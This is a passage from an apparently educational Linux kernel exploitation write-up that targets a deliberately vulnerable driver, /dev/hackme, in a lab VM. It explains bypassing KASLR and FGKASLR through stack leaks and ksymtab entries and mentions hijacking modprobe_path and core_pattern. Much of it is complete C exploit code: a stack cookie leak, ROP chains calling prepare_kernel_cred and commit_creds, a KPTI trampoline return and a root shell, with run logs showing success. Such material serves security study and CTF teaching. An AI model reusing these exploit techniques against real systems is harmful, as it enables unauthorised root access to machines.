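 * Returns 0 on success, -1 on failure. */
int write_unknown_format_file(const char *path) {
    static const unsigned char magic[4] = {0xff, 0xff, 0xff, 0xff};
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0755);
    if (fd < 0) {
        return -1;
    }
    ssize_t n = write(fd, magic, sizeof(magic));
    int rc = close(fd);
    if (n != (ssize_t) sizeof(magic) || rc != 0) {
        return -1;
    }
    /* Set the mode explicitly so that the umask cannot remove the execute bit. */
    return chmod(path, 0755);
}
```

Executing this file fails, but on the way the kernel tries to load a module for the unknown format and runs whatever modprobe_path points to.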

The whole procedure is reminiscent of the fine intricacies of a theater play, albeit with actors that have strange names.

I will spare you the details and the code, but if you want to know more, you can find more information in paragraph “Version 3: Probing the mods” of this writeup.

There are also other so-called user mode helpers in addition to modprobe that can be used in a similar way. As an example, the file /proc/sys/kernel/core_pattern determines how coredumps are written, and it can name a program that receives the coredump. This can again be overwritten to point to an evil binary, and then a coredump can be triggered to execute the evil binary.

Adding KASLR

Next, let us add KASLR back by replacing nokaslr with kaslr in run.sh, so that we have -append "console=ttyS0 kpti=1 kaslr quiet panic=1".

Preliminaries

To understand KASLR, let us first start with Address Space Layout Randomization (ASLR). ASLR is an exploit mitigation in user space that prevents building reliable ROP chains. It was added to Linux around 2005. The main idea is to randomize the memory layout, such that the ROP gadgets are at different addresses in different runs and thus cannot be reliably jumped to. There are various implementations: some only randomize the .text section, some also randomize the stack, heap, and libraries.

Usually, the way to bypass ASLR is to get an address leak. If only the base address of the loaded executable is randomized, then the offsets relative to that base are still the same in every run. From a single leaked address, the base address and thereby the addresses of all ROP gadgets can be calculated, which bypasses ASLR.

Kernel ASLR (KASLR) is basically ASLR, but in kernel mode. It was merged into Linux around 2014 in version 3.14. Originally, it loaded the kernel at a random base address but left the offsets intact. This old version can be activated using the options kaslr and nofgkaslr in run.sh.

In 2020, Function Granular KASLR (FGKASLR) was proposed as a set of kernel patches. It is a finer-grained form of kernel address space randomization in which the kernel code is rearranged per function. Hence, even when a kernel address leak exists, it is hard to exploit, as computing the relative offsets does not work anymore.

Reconnaissance

The introduction of KASLR breaks all our previously developed exploits, as it changes the addresses of the ROP gadgets.

There are two places where we can start our investigation. We can leak the stack and compare how it changes between different runs. Or we can modify initramfs/etc/inittab to give us a root shell so we can read /proc/kallsyms and compare the addresses of the kernel symbols between multiple runs.

Investigating the Stack

We already developed leak_stack.c above which allows us to read the stack. We executed this file two times and stored the output in stack1.txt and stack2.txt. Comparing the two outputs using diff stack1.txt stack2.txt yields the following.

3c3
< [+] offset 0 contains value: 0xffffffffa53648f0
---
> [+] offset 0 contains value: 0xffffffff8f8d0280
5,7c5,7
< [+] offset 2 contains value: 0xcd9ac705e3874700
< [+] offset 3 contains value: 0xffff981606caef10
< [+] offset 4 contains value: 0xffffaa5a001bfe68
---
> [+] offset 2 contains value: 0x310671060c9fe500
> [+] offset 3 contains value: 0xffff97ae86cae610
> [+] offset 4 contains value: 0xffffa424c01bfe68
9,15c9,15
< [+] offset 6 contains value: 0xffff981606caef00
< [+] offset 7 contains value: 0xffffaa5a001bfef0
< [+] offset 8 contains value: 0xffff981606caef00
< [+] offset 9 contains value: 0xffffaa5a001bfe80
< [+] offset 10 contains value: 0xffffffffa5749a47
< [+] offset 11 contains value: 0xffffffffa5749a47
< [+] offset 12 contains value: 0xffff981606caef00
---
> [+] offset 6 contains value: 0xffff97ae86cae600
> [+] offset 7 contains value: 0xffffa424c01bfef0
> [+] offset 8 contains value: 0xffff97ae86cae600
> [+] offset 9 contains value: 0xffffa424c01bfe80
> [+] offset 10 contains value: 0xffffffff8fd3d9c7
> [+] offset 11 contains value: 0xffffffff8fd3d9c7
> [+] offset 12 contains value: 0xffff97ae86cae600
17,19c17,19
< [+] offset 14 contains value: 0x7ffeda3ac880
< [+] offset 15 contains value: 0xffffaa5a001bfea0
< [+] offset 16 contains value: 0xcd9ac705e3874700
---
> [+] offset 14 contains value: 0x7ffe51038100
> [+] offset 15 contains value: 0xffffa424c01bfea0
> [+] offset 16 contains value: 0x310671060c9fe500
....

We can see that some addresses are similar in both runs. E.g., at offset 15 we had 0xffffaa5a001bfea0 and 0xffffa424c01bfea0. The last three and a half bytes are the same: 01bfea0.

If we squint hard enough, we can also see which lines are the same in both files. Another approach is using the comm command, which gives us immediately the lines that are the same in both files, but unfortunately only works on sorted inputs.

$ comm -12 <(sort stack1.txt) <(sort stack2.txt)
[*] trying to leak up to 320 bytes memory
[+] offset 1 contains value: 0x2a
[+] offset 13 contains value: 0x0
[+] offset 17 contains value: 0x140
[+] offset 18 contains value: 0x0
[+] offset 24 contains value: 0x140
[+] offset 25 contains value: 0x0
[+] offset 29 contains value: 0x0
[+] offset 32 contains value: 0x0
[+] offset 33 contains value: 0x0
[+] offset 34 contains value: 0x0
[+] offset 39 contains value: 0x0
[+] offset 5 contains value: 0x4
[+] successfully opened /dev/hackme

Here, we see that all values that stay the same are parameters and not addresses.

If we leak more values from the stack, we find more values that are similar between different runs. In particular, we are interested in values that look like kernel addresses and whose low-order digits stay the same across runs. The idea is that such a leaked value is the randomized base address plus a fixed offset. As the fixed offset is the same across multiple runs, we can compute the address of valuable functions if we know their distance to the leaked value, as that distance stays the same.
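Instead of squinting at diffs, the comparison can be automated. The following two predicates are a sketch with names of my own choosing; treating values whose upper 32 bits are all ones as kernel image addresses is a heuristic, not a guarantee.

```c
#include <stdbool.h>
#include <stdint.h>

/* True if v looks like an address inside the kernel image or a module,
 * i.e., its upper 32 bits are all ones. */
bool looks_like_kernel_text(uint64_t v) {
    return (v >> 32) == 0xffffffffULL;
}

/* True if a and b differ but agree in their lowest `bits` bits (0 < bits < 64). */
bool same_low_bits(uint64_t a, uint64_t b, unsigned bits) {
    uint64_t mask = (UINT64_C(1) << bits) - 1;
    return a != b && (a & mask) == (b & mask);
}
```

Applied to the two dumps above, the values at offset 15 agree in their lowest 28 bits, while the values at offset 10 already differ in their lowest 12 bits and are therefore not a simple base plus a fixed offset.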

How do we know if a leaked value is valuable? We can search for it in /proc/kallsyms, and if it corresponds to a symbol, it may be valuable, as we can compute offsets from that symbol.

As an example, if we set the lower two bytes of the value at the stack offset 38 to zero, we arrive at the base address of the kernel.

/ # ./leak_stack | grep 38
[+] offset 38 contains value: 0xffffffffa680a157
/ # grep ffffffffa6800000 /proc/kallsyms
ffffffffa6800000 T _text
ffffffffa6800000 T startup_64
ffffffffa6800000 T _stext

Another useful stack leak is at offset 41. Setting the lower bytes to zero yields again the address of a symbol in the kernel table.

/ # ./leak_stack | grep 41
[+] offset 41 contains value: 0xffffffffa6a0008c
[+] offset 53 contains value: 0x417421
[+] offset 58 contains value: 0x417421
/ # grep ffffffffa6a00000 /proc/kallsyms
ffffffffa6a00000 T native_usergs_sysret64
ffffffffa6a00000 T __entry_text_start

Note that we could now start to rebuild our ROP chain by computing the base address of the kernel from the stack offset 38. The addresses of the ROP gadgets can then be computed from their offsets to the kernel base address. This works for the old implementation of KASLR, i.e., for KASLR without FGKASLR.
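As a worked example of this arithmetic, the following sketch rebases addresses that were collected with KASLR disabled. The function names are hypothetical, and the static base 0xffffffff81000000 is the address of _text that I assume for the runs without KASLR.

```c
#include <stdint.h>

#define STATIC_KERNEL_BASE 0xffffffff81000000ULL  /* _text without KASLR (assumed) */
#define LEAK38_OFFSET      0xa157ULL              /* leak at stack offset 38 minus kernel base */

/* Recovers the randomized kernel base from the value at stack offset 38. */
uint64_t kernel_base_from_leak(uint64_t leak38) {
    return leak38 - LEAK38_OFFSET;
}

/* Translates an address collected with KASLR disabled to the current run. */
uint64_t rebase(uint64_t kernel_base, uint64_t static_addr) {
    return kernel_base + (static_addr - STATIC_KERNEL_BASE);
}
```

With the leak 0xffffffffa680a157 from above, the base is 0xffffffffa6800000 and commit_creds moves from 0xffffffff814c6410 to 0xffffffffa6cc6410.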

We need to set nofgkaslr in run.sh. Then, the following code implements the attack on simple KASLR that only adds a random offset to the kernel base address.

#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;
uint64_t cookie = 0;
uint64_t cookie_off = 16;

uint64_t user_cs, user_ss, user_rflags, user_sp;     // for storing the registers
uint64_t kernel_base;

// rop gadgets, all computed at runtime in leak_cookie() from the leaked kernel base
uint64_t prepare_kernel_cred;
uint64_t commit_creds;
uint64_t pop_rdi_ret;     // pop rdi; ret
uint64_t mov_rdi_rax_movrsi_poprbp; // mov rdi, rax; mov [rsi+0x140], rdi; pop rbp; ret;
uint64_t swapgs_restore_regs_and_return_to_usermode; // KPTI trampoline


void open_dev(){
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}

void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %zu bytes memory\n", sizeof(leak));
    ssize_t n = read(global_fd, leak, sizeof(leak));
    if (n < 0) {
        perror("[-] read");
        exit(-1);
    }
    cookie = leak[cookie_off];
    printf("[+] leaked cookie 0x%lx at offset %lu \n", cookie, cookie_off);
    kernel_base = leak[38] - 0x0a157UL;
    printf("[+] leaked kernel_base 0x%lx\n", kernel_base);
    prepare_kernel_cred = kernel_base + 0x4c67f0UL;   // the offset from /proc/kallsyms
    printf("[+] leaked prepare_kernel_cred 0x%lx\n", prepare_kernel_cred);
    commit_creds = kernel_base + 0x4c6410UL;
    printf("[+] leaked ksymtab_commit_creds 0x%lx\n", commit_creds);
    pop_rdi_ret = kernel_base + 0x00767cUL;     // pop rdi; ret
    mov_rdi_rax_movrsi_poprbp = kernel_base + 0x6bf203UL; // mov rdi, rax; mov [rsi+0x140], rdi; pop rbp; ret;
    swapgs_restore_regs_and_return_to_usermode = kernel_base + 0x200f10UL; // the offset from /proc/kallsym
}


void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}

void payload(){
    uid_t uid = getuid();
    if (uid == 0) {
        printf("[+] we are root (uid = %d)\n", uid);
    } else {
        printf("[!] we are not root (uid: %d)\n", uid);
        exit(-1);
    }
    execl("/bin/sh", "sh", NULL);
    exit(0);
}

uint64_t user_rip = (uint64_t) payload;     // the last part of our ROP chain

void overflow_stack(){
    uint8_t sz = 40;
    uint64_t payload[sz];
    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) pop_rdi_ret;
    payload[cookie_off++] = (uint64_t) 0;
    payload[cookie_off++] = (uint64_t) prepare_kernel_cred;  // prepare_kernel_cred(0)

    payload[cookie_off++] = (uint64_t) mov_rdi_rax_movrsi_poprbp;  // need to move result to rdi
    payload[cookie_off++] = (uint64_t) 0; // popped into rbp
    payload[cookie_off++] = (uint64_t) commit_creds; // commit_creds(prepare_kernel_cred(0))

    payload[cookie_off++] = (uint64_t) swapgs_restore_regs_and_return_to_usermode + 22; // KPTI trampoline, +22 jumps to the first mov, so we need dummy pops
    payload[cookie_off++] = (uint64_t) 0; // dummy RAX
    payload[cookie_off++] = (uint64_t) 0; // dummy RDI
    payload[cookie_off++] = (uint64_t) user_rip;
    payload[cookie_off++] = (uint64_t) user_cs;
    payload[cookie_off++] = (uint64_t) user_rflags;
    payload[cookie_off++] = (uint64_t) user_sp;
    payload[cookie_off++] = (uint64_t) user_ss;

    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");
}

int main(int argc, char **argv){
    open_dev();
    save_state();
    leak_cookie();
    overflow_stack();
    return 0;
}

Executing this code yields the following:

/ $ ./exploit_kaslr
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie 0x7db22304978a2500 at offset 16
[+] leaked kernel_base 0xffffffffb3a00000
[+] leaked prepare_kernel_cred 0xffffffffb3ec67f0
[+] leaked ksymtab_commit_creds 0xffffffffb3ec6410
[+] we are root (uid = 0)

The next step is dealing with full FGKASLR, where the randomization takes place at the granularity of individual functions.

Comparing Addresses of Kernel Symbols

After investigating the stack, let us now compare the location of kernel symbols for different runs. For this, we need to modify initramfs/etc/inittab to give us a root shell so we can access /proc/kallsyms.

We execute run.sh and then take a look at /proc/kallsyms. To be able to simply cat /proc/kallsyms and copy the output, we had to increase the size of the scrollback buffer. We then did the same for a second run.

Comparing the locations of the kernel symbols for these two runs, e.g., using vimdiff, shows that FGKASLR does not apply to the whole kernel space.

Below we see an excerpt of the first run.

ffffffffa7200000 T _text
...
ffffffffa7600dc6 T __x86_retpoline_r15
ffffffffa7600de0 T pm_wakeup_source_sysfs_add
...

And here is an excerpt of the second run.

ffffffff83e00000 T _text
...
ffffffff84200dc6 T __x86_retpoline_r15
ffffffff84200de0 T agp_bind_memory
...

For the section between _text and __x86_retpoline_r15, only the three hex digits after ffffffff differ between the two runs. The order of the symbols and their relative distances are the same. Hence, this section is affected only by KASLR, but not by FGKASLR. The length of this area is ffffffff84200dc6 - ffffffff83e00000 = 400dc6.
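
The comparison can also be done programmatically. The following is a minimal sketch with helper names of my own choosing: it parses a line in the /proc/kallsyms format shown above and checks whether a symbol has the same distance from _text in both runs. It assumes the simple three-column format and ignores any module suffix.

```c
#include <assert.h>
#include <inttypes.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Parse one kallsyms line of the form "<hex address> <type> <name>". */
bool parse_kallsyms_line(const char *line, uint64_t *addr, char *type, char name[128])
{
    return sscanf(line, "%" SCNx64 " %c %127s", addr, type, name) == 3;
}

/* Offset of a symbol relative to _text of the same run. */
uint64_t offset_from_text(uint64_t text_addr, uint64_t sym_addr)
{
    assert(sym_addr >= text_addr);
    return sym_addr - text_addr;
}

/* True if a symbol sits at the same distance from _text in both runs. */
bool same_offset_in_both_runs(uint64_t text1, uint64_t sym1,
                              uint64_t text2, uint64_t sym2)
{
    return offset_from_text(text1, sym1) == offset_from_text(text2, sym2);
}
```

A symbol for which same_offset_in_both_runs() holds across several boots is a candidate for the KASLR-only area. A symbol whose offset changes between boots is shuffled by FGKASLR.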

After __x86_retpoline_r15, the order of the functions differs between the runs. This is where FGKASLR is applied.

What is not shown in the excerpt is that even later, from the symbol __start_rodata to the end, again only KASLR is applied. As suggested by the name, this section contains read-only data. It is not executable and hence cannot be used directly for the construction of ROP gadgets. However, it contains structs such as the ksymtab entries, which can be used to calculate addresses.

As an example, both functions prepare_kernel_cred and commit_creds are in the section randomized using FGKASLR. Hence, we cannot compute their addresses by simply adding a fixed offset to the kernel base address. But within ksymtab there are the structs __ksymtab_prepare_kernel_cred and __ksymtab_commit_creds. These are defined as follows.

struct kernel_symbol {
    int value_offset;
    int name_offset;
    int namespace_offset;
};

The value_offset is a signed 32-bit offset relative to the address of the entry itself. If we add the value_offset to the address of the entry, we get the address of the actual symbol. Thus, we can compute the addresses of prepare_kernel_cred and commit_creds using an appropriate ROP chain, even though these symbols reside in the memory area using FGKASLR.
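
To make the relative addressing concrete, here is a small user-space sketch. The struct is the one shown above. The demo_blob type and both function names are hypothetical stand-ins that I made up for illustration: an int plays the role of the function, and a table entry stored right behind it plays the role of its __ksymtab_ entry.

```c
#include <assert.h>
#include <stdint.h>

/* Same layout as the struct shown above. */
struct kernel_symbol {
    int value_offset;
    int name_offset;
    int namespace_offset;
};

/*
 * Resolve the symbol an entry refers to: the stored offset is signed and
 * relative to the address of the value_offset field, which is also the
 * address of the entry because it is the first field.
 */
uintptr_t resolve_symbol(const struct kernel_symbol *sym)
{
    return (uintptr_t)&sym->value_offset + (intptr_t)sym->value_offset;
}

/* Hypothetical stand-in: a target and its table entry in one object. */
struct demo_blob {
    int target;                 /* plays the role of the function */
    struct kernel_symbol entry; /* plays the role of __ksymtab_<name> */
};

/* Fill in entry.value_offset so that it points back at target. */
void demo_link(struct demo_blob *blob)
{
    intptr_t delta = (intptr_t)((uintptr_t)&blob->target -
                                (uintptr_t)&blob->entry.value_offset);
    assert(delta < 0); /* the target precedes the entry, so the offset is negative */
    blob->entry.value_offset = (int)delta;
}
```

In the kernel image used here the situation is the same as in the sketch: the functions live at lower addresses than the symbol table, so the stored offsets are negative and have to be treated as signed values.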

Further, if we take a look at the ROP gadgets that we used previously, we see that all of them reside in the KASLR section, except for mov_rdi_rax_movrsi_poprbp = 0xffffffff816bf203, which resides in the FGKASLR section.

We can filter for gadgets in the correct section using ROPgadget (pip install ROPGadget) with ROPgadget --binary ./vmlinux --range 0xffffffff81000000-0xffffffff81400dc6, or using ropr (cargo install ropr) with ropr --range "0xffffffff81000000-0xffffffff81400dc6" ./vmlinux.
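
The same filter can be expressed as a small check inside an exploit or a helper script. This is only a sketch with names of my own: it uses the range from the commands above, i.e., the load address 0xffffffff81000000 of the non-randomized kernel and the length 0x400dc6 measured earlier.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define STATIC_KERNEL_BASE  0xffffffff81000000ULL /* start of the range used above */
#define KASLR_ONLY_TEXT_LEN 0x400dc6ULL           /* _text up to __x86_retpoline_r15, as measured above */

/*
 * True if a gadget address taken from the non-randomized vmlinux lies in
 * the leading text range that FGKASLR does not shuffle.
 */
bool gadget_survives_fgkaslr(uint64_t static_addr)
{
    assert(static_addr >= STATIC_KERNEL_BASE);
    return static_addr - STATIC_KERNEL_BASE < KASLR_ONLY_TEXT_LEN;
}
```

For example, the pop rdi; ret gadget at 0xffffffff8100767c passes this check, while mov_rdi_rax_movrsi_poprbp at 0xffffffff816bf203 does not.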

As we know that without KASLR the kernel is loaded at 0xffffffff81000000, we can quickly compute the offsets. As an example, the previous exploit, which used a signal for the KPTI bypass, had the following ROP gadget.

uint64_t pop_rdi_ret = 0xffffffff8100767c; // pop rdi; ret

With KASLR, this becomes the following.

uint64_t pop_rdi_ret = kernel_base + 0x0000767cUL; // pop rdi; ret
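
The conversion can be wrapped in a tiny helper so that addresses can be copied from the non-randomized vmlinux as they are. This is a sketch and the function name rebase is my own choice.

```c
#include <assert.h>
#include <stdint.h>

#define STATIC_KERNEL_BASE 0xffffffff81000000ULL /* kernel base without KASLR */

/*
 * Translate an address taken from the non-randomized vmlinux into the
 * address it has in a run whose kernel base was leaked.
 */
uint64_t rebase(uint64_t kernel_base, uint64_t static_addr)
{
    assert(static_addr >= STATIC_KERNEL_BASE);
    return kernel_base + (static_addr - STATIC_KERNEL_BASE);
}
```

With the kernel base 0xffffffffb3a00000 from the run shown earlier, rebase(kernel_base, 0xffffffff8100767c) gives 0xffffffffb3a0767c. This is only valid for addresses in the areas that are not shuffled by FGKASLR.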

Leaking the Addresses of `prepare_kernel_cred` and `commit_creds`

For our exploit we need the addresses of the functions prepare_kernel_cred and commit_creds. Unfortunately for us, both of these symbols are in a section of the kernel that is affected by FGKASLR. Hence, we cannot compute their addresses in the kernel by adding a fixed offset to the kernel base.

However, we already saw that there is a section at the end of the kernel memory containing read-only data whose addresses are randomized using only KASLR and not FGKASLR. This section contains the structs __ksymtab_prepare_kernel_cred and __ksymtab_commit_creds, whose addresses we can compute. From these, we can compute the addresses of prepare_kernel_cred and commit_creds.

So let us start by locating __ksymtab_prepare_kernel_cred and __ksymtab_commit_creds by adding their offsets to the kernel base address. For this, we modified the function leak_cookie() as follows:

void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %zu bytes memory\n", sizeof(leak));
    ssize_t n = read(global_fd, leak, sizeof(leak));
    if (n < 0) {
        perror("[-] read");
        exit(-1);
    }
    cookie = leak[16];
    printf("[+] leaked cookie: 0x%lx\n", cookie);
    uint64_t kernel_base = leak[38] - 0x0a157UL;
    printf("[+] leaked kernel_base 0x%lx\n", kernel_base);
    // the ksymtab entries are at fixed offsets from the kernel base
    uint64_t ksymtab_prepare_kernel_cred = kernel_base + 0xf8d4fcUL;
    printf("[+] leaked ksymtab_prepare_kernel_cred 0x%lx\n", ksymtab_prepare_kernel_cred);
    uint64_t ksymtab_commit_creds = kernel_base + 0xf87d90UL;
    printf("[+] leaked ksymtab_commit_creds 0x%lx\n", ksymtab_commit_creds);
}

Running this yields the real addresses of the two entries, as a comparison with their locations in /proc/kallsyms shows.

/ # ./leak_cookie
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie: 0xaec7370351852800
[+] leaked kernel_base 0xffffffffbd600000
[+] leaked ksymtab_prepare_kernel_cred 0xffffffffbe58d4fc
[+] leaked ksymtab_commit_creds 0xffffffffbe587d90
/ # cat /proc/kallsyms | grep ffffffffbe58d4fc
ffffffffbe58d4fc r __ksymtab_prepare_kernel_cred
/ # cat /proc/kallsyms | grep ffffffffbe587d90
ffffffffbe587d90 r __ksymtab_commit_creds

What remains is to compute the location of prepare_kernel_cred from __ksymtab_prepare_kernel_cred and the location of commit_creds from __ksymtab_commit_creds.

Remember that the kernel symbols structs are defined as follows:

struct kernel_symbol {
    int value_offset;
    int name_offset;
    int namespace_offset;
};

Hence, we can now use a ROP gadget to store ksymtab_commit_creds - 0x10 in rax. The next gadget reads from [rax + 0x10], so subtracting 0x10 makes it load exactly the value_offset of the entry into eax. We then obtain the memory location of commit_creds by adding the value_offset to the location of ksymtab_commit_creds.
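
As a sketch, the part of the chain that performs this read can be factored into a helper. The function name and the READ_GADGET_DISP constant are mine. The two gadget parameters correspond to pop_rax_ret and read_mem_pop1_ret in the code below.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define READ_GADGET_DISP 0x10ULL /* the read gadget loads from [rax + 0x10] */

/*
 * Write the sequence "pop rax; ret" followed by the read gadget into
 * chain[] so that the load hits target_addr. Returns the number of
 * 8-byte slots used.
 */
size_t build_read32_chain(uint64_t *chain, uint64_t pop_rax_ret,
                          uint64_t read_mem_pop1_ret, uint64_t target_addr)
{
    size_t i = 0;

    assert(chain != NULL);
    chain[i++] = pop_rax_ret;
    chain[i++] = target_addr - READ_GADGET_DISP; /* compensate for the +0x10 */
    chain[i++] = read_mem_pop1_ret;
    chain[i++] = 0;                              /* consumed by the pop rbp of the gadget */
    return i;
}
```

After these four slots, eax holds the 32-bit value stored at target_addr, and the chain can continue with the return to user space.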

The full code to compute the memory location of commit_creds is as follows.

#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>


char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;
uint64_t cookie = 0;
uint64_t cookie_off = 16;

uint64_t kernel_base;
uint64_t ksymtab_prepare_kernel_cred;
uint64_t ksymtab_commit_creds;

uint64_t pop_rax_ret; // pop rax; ret
uint64_t read_mem_pop1_ret; // mov eax, qword ptr [rax + 0x10]; pop rbp; ret;
uint64_t swapgs_restore_regs_and_return_to_usermode; // The KPTI trampoline

uint64_t tmp;

uint64_t user_cs, user_ss, user_rflags, user_sp;     // for storing the registers


void open_dev(){
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}

void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}

void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %zu bytes memory\n", sizeof(leak));
    ssize_t n = read(global_fd, leak, sizeof(leak));
    if (n < 0) {
        perror("[-] read");
        exit(-1);
    }
    cookie = leak[16];
    printf("[+] leaked cookie: 0x%lx\n", cookie);
    kernel_base = leak[38] - 0x0a157UL;   // assign the global instead of shadowing it
    printf("[+] leaked kernel_base 0x%lx\n", kernel_base);
    ksymtab_prepare_kernel_cred = kernel_base + 0xf8d4fcUL;
    printf("[+] leaked ksymtab_prepare_kernel_cred 0x%lx\n", ksymtab_prepare_kernel_cred);
    ksymtab_commit_creds = kernel_base + 0xf87d90UL;
    printf("[+] leaked ksymtab_commit_creds 0x%lx\n", ksymtab_commit_creds);

    pop_rax_ret = kernel_base + 0x4d11UL;
    read_mem_pop1_ret = kernel_base + 0x4aaeUL; // mov eax, qword ptr [rax + 0x10]; pop rbp; ret;
    swapgs_restore_regs_and_return_to_usermode = kernel_base + 0x200f10UL; // the offset from /proc/kallsyms
}

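void get_commit_creds(void){
    // rax still holds the value loaded by the ROP chain, so save it first
    __asm__(
        ".intel_syntax noprefix;"
        "mov tmp, rax;"
        ".att_syntax;"
    );
    // value_offset is a signed 32-bit value, hence the cast to int
    uint64_t commit_creds = ksymtab_commit_creds + (int)tmp;
    // note: this prints the sum without the cast, so the upper 32 bits are missing in the output
    printf("[+] leaked commit_creds 0x%lx\n", ksymtab_commit_creds + tmp);
}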

void stage1(){
    uint8_t sz = 50;
    uint64_t payload[sz];
    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) pop_rax_ret;
    payload[cookie_off++] = (uint64_t) ksymtab_commit_creds - 0x10;
    payload[cookie_off++] = (uint64_t) read_mem_pop1_ret;
    payload[cookie_off++] = (uint64_t) 0; // dummy pop

    payload[cookie_off++] = (uint64_t) swapgs_restore_regs_and_return_to_usermode + 22; // The KPTI trampoline
    payload[cookie_off++] = (uint64_t) 0; // dummy rax
    payload[cookie_off++] = (uint64_t) 0; // dummy rdi

    payload[cookie_off++] = (uint64_t) get_commit_creds;  // compute the location of commit_creds

    payload[cookie_off++] = (uint64_t) user_cs;
    payload[cookie_off++] = (uint64_t) user_rflags;
    payload[cookie_off++] = (uint64_t) user_sp;
    payload[cookie_off++] = (uint64_t) user_ss;

    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");
}

int main(int argc, char **argv){
    open_dev();
    save_state();
    leak_cookie();
    stage1();
    return 0;
}

Executing this yields the following.

/ # ./leak_commit_creds
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie: 0xbde6cd8832184c00
[+] leaked kernel_base 0xffffffffb3000000
[+] leaked ksymtab_prepare_kernel_cred 0xffffffffb3f8d4fc
[+] leaked ksymtab_commit_creds 0xffffffffb3f87d90
[+] leaked commit_creds 0xb385a200
Segmentation fault

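Apart from the missing upper 32 bits, this is the true location of the symbol commit_creds, as we can easily verify. The upper bits are lost because the printf adds tmp without the cast to int, so the negative value_offset is not sign-extended.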

/ # cat /proc/kallsyms | grep b385a200
ffffffffb385a200 T commit_creds
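
The log prints 0xb385a200 while kallsyms lists ffffffffb385a200. The following sketch shows where the difference comes from. The function names are mine, and the offset value 0xff8d2470 used in the note below is derived from the two addresses in the log, not read from the kernel.

```c
#include <assert.h>
#include <stdint.h>

/* Correct: treat the low 32 bits of rax as a signed offset. */
uint64_t add_signed_offset(uint64_t entry_addr, uint64_t rax)
{
    assert((rax >> 32) == 0); /* a write to eax clears the upper half of rax */
    return entry_addr + (uint64_t)(int64_t)(int32_t)(uint32_t)rax;
}

/* What the printf in get_commit_creds computes: rax added as an unsigned value. */
uint64_t add_zero_extended(uint64_t entry_addr, uint64_t rax)
{
    return entry_addr + rax;
}
```

With entry_addr = 0xffffffffb3f87d90 and rax = 0xff8d2470, add_signed_offset() yields 0xffffffffb385a200, whereas add_zero_extended() wraps around and yields 0xb385a200, which is the value seen in the log.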

The memory location of prepare_kernel_cred can be retrieved similarly.

Game Plan

After showing these building blocks, we can now stitch together the complete game plan for exploiting the kernel driver with FGKASLR enabled. We leak enough values from the stack to get the base address of the kernel from offset 38. Then, we craft a ROP chain with gadgets in the memory area that is only affected by KASLR, but not by FGKASLR. This ROP chain reads the kernel symbol table entries in the read-only data section of kernel memory. The addresses of these entries can again be computed, as they are at a constant offset from the kernel base address and are affected only by KASLR, not by FGKASLR. We use these entries to compute the addresses of the functions prepare_kernel_cred and commit_creds. Even though these functions are in the memory area affected by FGKASLR, we can recover their addresses, as their offsets are stored in the kernel symbol table.

Then, we need to execute prepare_kernel_cred and commit_creds as before and should be presented with a root shell.

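What remains is to circumvent the need for a gadget that moves the result of prepare_kernel_cred into the argument of commit_creds, i.e., from rax to rdi. Previously, we had a gadget for this, but it is in the section affected by FGKASLR and hence not available anymore. Instead, we return to user space after each step, save rax in a user-space variable, and start a new ROP chain that loads the saved value into rdi with a pop rdi; pop rbx; ret gadget.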
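
Since every stage of the exploit returns to user space, all stages end with the same eight stack slots: the trampoline entry, two dummy values, and the frame with rip, cs, rflags, rsp and ss. As a sketch, this tail could be factored into a helper. The struct and function names are mine, and the complete code below writes these slots out by hand instead.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* User-space register state as captured by save_state(). */
struct user_state {
    uint64_t cs, rflags, sp, ss;
};

/*
 * Append the common tail of a stage starting at payload[idx].
 * Returns the index one past the last slot written.
 */
size_t append_return_to_user(uint64_t *payload, size_t idx, size_t capacity,
                             uint64_t trampoline, uint64_t user_rip,
                             const struct user_state *st)
{
    assert(idx + 8 <= capacity);      /* the tail needs eight slots */
    payload[idx++] = trampoline + 22; /* enter the trampoline at the first mov */
    payload[idx++] = 0;               /* dummy rax */
    payload[idx++] = 0;               /* dummy rdi */
    payload[idx++] = user_rip;        /* user-space function that continues the exploit */
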